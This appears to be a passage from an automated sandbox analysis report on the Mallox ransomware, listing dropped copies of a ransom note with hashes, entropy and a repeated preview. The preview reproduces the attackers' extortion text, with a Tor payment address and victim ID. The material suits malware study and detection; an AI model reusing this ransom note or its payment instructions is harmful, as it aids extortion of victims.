                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\de-LI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\de-LU\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\el-GR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-029\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-AU\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-BZ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-CA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-GB\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-HK\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-ID\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-IE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-IN\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-JM\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-MY\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-NZ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-SG\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-TT\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-ZA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\en-ZW\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
